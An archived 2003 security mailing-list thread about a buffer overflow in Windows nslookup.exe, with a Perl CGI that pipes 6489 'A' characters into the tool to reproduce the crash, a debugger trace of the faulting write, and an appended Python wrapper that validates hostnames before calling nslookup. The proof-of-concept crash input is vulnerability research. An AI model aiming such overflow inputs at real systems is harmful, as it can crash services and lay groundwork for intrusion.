Re: NSLOOKUP.EXE

From: Ryan Yagatich (ryanyat_private)
Date: Fri Mar 21 2003 - 09:04:49 PST


    ==begin silly.cgi
    
    #!perl -w
    
    use strict;
    # Minimal CGI header so the web server accepts the response.
    print "Content-type: text/html\n\n";
    
    # Pipe into nslookup.exe's interactive prompt, the same input path as typing at "> ".
    open(NSLOOKUP,"|nslookup.exe") || die "Could not open nslookup.exe (path?)";
    # 6489 bytes of 'A' on stdin reproduces the access violation shown below.
    print NSLOOKUP "A" x 6489;
    close(NSLOOKUP);
    
    ==end silly.cgi
    
    MSDE:
    Unhandled exception at 0x01004d65 in NSLOOKUP.EXE: 0xC0000005: Access 
    violation writing location 0x0103e000.
    
         01004D5D  cmp         esi,100F770h 
         01004D63  je          01004D6F 
    ---> 01004D65  mov         dword ptr [edi],esi 
         01004D67  add         edi,4 
         01004D6A  jmp         01004C37 
    
    
    01004D65 = 16797029
    
    ,_____________________________________________________,
    \ Ryan Yagatich                     supportat_private \
    / Pantek Incorporated                  (877) LINUX-FIX /
    \ http://www.pantek.com/security        (440) 519-1802 \
    /       Are your networks secure? Are you certain?     /
    \___A4536371BF88C57DB181799D00BCA331E6AD909D297C3493___\
    
    On Thu, 20 Mar 2003, Blue Boar wrote:
    
    >Patrick Webster wrote:
    >> Can you do anything interesting with this?:
    >> 
    >> C:\>nslookup
    >> Default Server:  dns.server.net
    >> Address:  111.222.333.444
    >> 
    >> 
    >>>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    >> 
    >> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    >> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    >> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    >> 
    >> Gives error: memory can't be "read" - 0x414141 (aka A).
    >
    >If you have to manually type all the A's, then probably not.  Maybe if 
    >someone did something silly like make a CGI script that calls nslookup.exe 
    >directly with user input.
    >
    >What OS are you testing on?  It looks like it's fixed in XP:
    >
    >C:\winxp\system32>nslookup
    >Default Server:  dns1.snfcca.sbcglobal.net
    >Address:  206.13.28.12
    >
    > > 
    >AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    >AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    >AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    >AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    >*** Input is too long
    > >
    >
    >
    >					BB
    >
    
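The scenario Blue Boar describes, a CGI that hands raw user input to nslookup.exe, is the only realistic way this crash becomes reachable remotely. The following is an added example, not code from the original thread, of how such a wrapper should bound its input before the external tool ever sees it: it enforces the RFC 1035 name and label length limits (253 and 63 characters), accepts only hostname characters, and invokes nslookup as an argument vector rather than through a shell or its interactive stdin. The function names, the `nslookup` binary being on PATH, and the 5-second timeout are assumptions of this example.

```python
#!/usr/bin/env python3
"""Hypothetical hardened replacement for the silly.cgi pattern (added example,
not from the original post): validate the user-supplied name before nslookup
is invoked at all."""
import re
import subprocess

# RFC 1035 limits: a full name is at most 253 characters in text form and
# each label at most 63 octets.
MAX_NAME_LEN = 253
MAX_LABEL_LEN = 63
# A label starts and ends with an alphanumeric; hyphens only in the middle.
# A leading hyphen is also rejected, so a name can never look like an option.
LABEL_RE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$")


def validate_hostname(name: str) -> bool:
    """Return True only for a syntactically valid DNS hostname."""
    if not name:
        return False
    if name.endswith("."):          # allow a single trailing dot for an FQDN
        name = name[:-1]
    if not name or len(name) > MAX_NAME_LEN:
        return False
    labels = name.split(".")        # an empty label (e.g. "a..b") fails the regex
    return all(len(lbl) <= MAX_LABEL_LEN and LABEL_RE.match(lbl) for lbl in labels)


def safe_lookup(name: str, nslookup: str = "nslookup", timeout: float = 5.0) -> str:
    """Run nslookup on a validated name and return its stdout.

    Assumes an nslookup binary on PATH (placeholder for the real deployment path).
    The name is passed as an argv element, never on nslookup's interactive stdin
    and never through a shell, so the 6489-byte input above is rejected before
    any process is started.
    """
    if not validate_hostname(name):
        raise ValueError("rejected: not a valid DNS hostname")
    result = subprocess.run(
        [nslookup, name], capture_output=True, text=True, timeout=timeout
    )
    return result.stdout


if __name__ == "__main__":
    import sys
    # Constructed usage: python3 safe_lookup.py www.example.com
    print(safe_lookup(sys.argv[1] if len(sys.argv) > 1 else "A" * 6489))
```

The length check alone is what matters for the crash in this thread; the character check is what keeps the same wrapper from being abused in other ways (option injection, shell metacharacters). Underscored names such as SRV owner names are deliberately outside this validator's scope, since it is meant for hostnames only.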



    This archive was generated by hypermail 2b30 : Fri Mar 21 2003 - 10:51:11 PST